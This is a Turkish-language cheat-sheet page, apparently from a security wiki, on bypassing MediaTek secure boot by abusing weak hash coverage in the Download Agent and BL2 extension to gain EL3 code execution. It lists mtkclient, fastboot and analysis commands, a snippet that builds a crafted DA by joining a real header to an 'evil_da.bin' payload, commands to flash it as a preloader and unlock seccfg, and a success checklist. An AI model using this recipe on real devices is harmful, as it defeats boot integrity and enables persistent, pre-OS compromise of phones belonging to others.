Skip to content

Android Mediatek Secure Boot Bl2 Ext Bypass El3

hardware mediatek

MediaTek cihazlarda Download Agent (DA) ve BL2 uzantıları secure boot zincirinin kritik halkalarıdır. Zayıf imza veya hash doğrulama, özel DA ile kalıcı veya pre-OS kod çalıştırmaya gider.

  1. Chipset / BL versiyonunu ve public DA araç zincirini belirle.

  2. Resmi/leak DA binary’lerini ve imza blob’larını karşılaştır.

  3. Hash/length veya ext-region doğrulama boşluğunu izole et.

  4. Özel payload ile EL3/EL1 primitifini (RW veya log) kanıtla.

Terminal window
adb shell getprop | rg -i 'mtk|mediatek|bootloader|gsm.version'
Terminal window
fastboot getvar all
Terminal window
mtk payload --serialno SERIAL
Terminal window
# spflashtool / mtkclient
python3 mtk.py printgpt
Terminal window
python3 mtk.py r boot boot.img
Terminal window
file DA_*.bin BL2*.bin
Terminal window
binwalk -A DA.bin
Terminal window
arm-none-eabi-objdump -d BL2.elf | head
Terminal window
rg -n 'hash|sha|verify|ext|bl2' ghidra_exports/ | head
bl2_ext bölgesi veya DA header length ile hash kapsamı dışına taşma
# Pseudocode: hash sadece prefix üzerinde
header = open('da.bin','rb').read(0x200)
payload = open('evil_da.bin','rb').read()
open('crafted.bin','wb').write(header + payload)
Terminal window
python3 mtk.py w --preloader crafted.bin
Terminal window
python3 mtk.py da seccfg unlock
Başarı: custom DA kabul + UART/log'da EL3 marker veya arbitrary RW
[ ] chipset/BL sürümü kilitlendi
[ ] DA/BL2 binary'leri alındı
[ ] hash/imza kapsamı analiz edildi
[ ] crafted DA yüklendi
[ ] EL3/pre-OS primitif kanıtlandı